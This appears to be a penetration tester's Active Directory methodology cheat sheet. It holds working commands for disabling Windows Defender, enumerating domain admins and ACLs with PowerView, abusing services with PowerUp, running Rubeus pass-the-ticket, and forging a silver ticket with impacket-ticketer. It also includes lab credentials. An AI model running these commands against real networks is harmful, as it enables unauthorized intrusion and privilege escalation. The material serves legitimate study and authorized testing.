# Methodology

## Enumerating AD Environment

### Listing Shares on Windows

<pre><code>## view the shares
<strong>net view \\Computername.abc.corp  
</strong>
## List the Shares
dir \\computer-name.abc.corp     
</code></pre>

### Impacket-SmbServer to Host Files

We can use impacket-smbserver to host files as well and Run files from this share as well.

<pre class="language-python"><code class="lang-python">impacket-smbserver -smb2support -user test -password test share $(pwd)
<strong>
</strong>### without password
<strong>impacket-smbserver -smb2support share $(pwd)    
</strong></code></pre>

then on Target windows machine, we need to connect to this share and run our tools.

```
net use \\IP_add_of_kali\share
```

### Turn AV off&#x20;

```
# Run in CMD
"C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all 
### In PowerShell
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true 
```

## PowerView Enumerating Basic Stuff

#### Enumerate AD Users

Only Get-DomainUser command will print very Long info so you can use below command to filter just the usernames&#x20;

```
Get-DomainUser | select -ExpandProperty samaccountname
```

#### Enumerating AD Computers

This command will get all of the computer names in the Domain.

```
Get-DomainComputer | select -ExpandProperty dnshostname
```

#### Enumerating Domain Admins Group

```
Get-DomainGroup -Identity "Domain Admins"
```

#### Enumerating Domain Admins Group Members

```
Get-DomainGroupMember -Identity "Domain Admins"
```

#### Enumerating Enterprise Admins Group Members

```python
Get-DomainGroupMember -Identity "Enterprise Admins"
#We need to query the root domain as Enterprise Admins group is present only in the root of a forest.
Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local
```

### PowerView Enumerating Advanced

#### Enumerating ACL's

```python
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "USERNAME HERE"}

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "GROUP NAME HERE"}
```

#### Enumerating Organizational Unit (OU)

```python
Get-DomainOU | select -ExpandProperty name
#Now, to list all the computers in the DevOps OU:
(Get-DomainOU -Identity DevOps).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name
```

## Tools and Commands

### Powerup.ps1

To Invoke any abuse function with your own username you can use below command.

```
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'DOMAIN\USERNAME' -Verbose
```

### Bloodhound-python

We can use bloodhound to enumerate the domain if we have a valid set of credentials, we can use bloodhound.py kali linux script to do some enumeration

```python
 bloodhound-python --dns-tcp -ns 10.10.179.143 -d klendathu.vl -u 'zim' -p 'football22' -c all
```

### Rubeus Commands.

```python
# Request a TGT and Inject In Memory
Rubeus.exe asktgt /user:Username /rc4:HASH /domain:abc.local /ptt

## if you have password

Rubeus.exe asktgt /user:Username /password:password /domain:abc.local /ptt

```

### Runas Command&#x20;

```
runas /user:domain\username "C:\Windows\System32\cmd.exe"
```

### PS-Session and Cred Object

```
$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain\user', $SecPassword)

enter-pssession -computer abc.corp.local -credential $c
```

## Silver Ticket Attack

In a silver ticket attack, the attacker can forge a valid TGS (Ticket granting Service) and then attacker can access that service using that TGS.

For this attack we need the NTLM hash of the service account user. for this we can use online tools, or below python code

```python
# Below code will give NTLM Hash of test1234
import hashlib,binascii
hash = hashlib.new('md4', "test1234".encode('utf-16le')).digest();
print(binascii.hexlify(hash));
```

For Domain SID we can use&#x20;

```python
# Below command will print the Domain SID
impacket-lookupsid domain/username:password@10.10.231.85
```

now we have both NTLM hash and the Domain SID so we can craft the Silver Ticket Attack, for this i like to use **Impacket-ticketer**

<pre class="language-python"><code class="lang-python"><strong>impacket-ticketer -spn MSSQLSvc/srv1.klendathu.vl -domain klendathu.vl -domain-sid S-1-5-21-641890747-1618203462-755025521 -nthash E2F156A20FA3AC2B16768F8ADD53D72C administrator 
</strong></code></pre>

this will create a administrator.ccache file

```python
#export the ticker
export KRB5CCNAME=administrator.ccache

# then use this ticket to access any service like MSSQL

impacket-mssqlclient -k -no-pass <domain name or subdomain>

#e.g

impacket-mssqlclient -k -no-pass SRV1.Klendathu.vl
```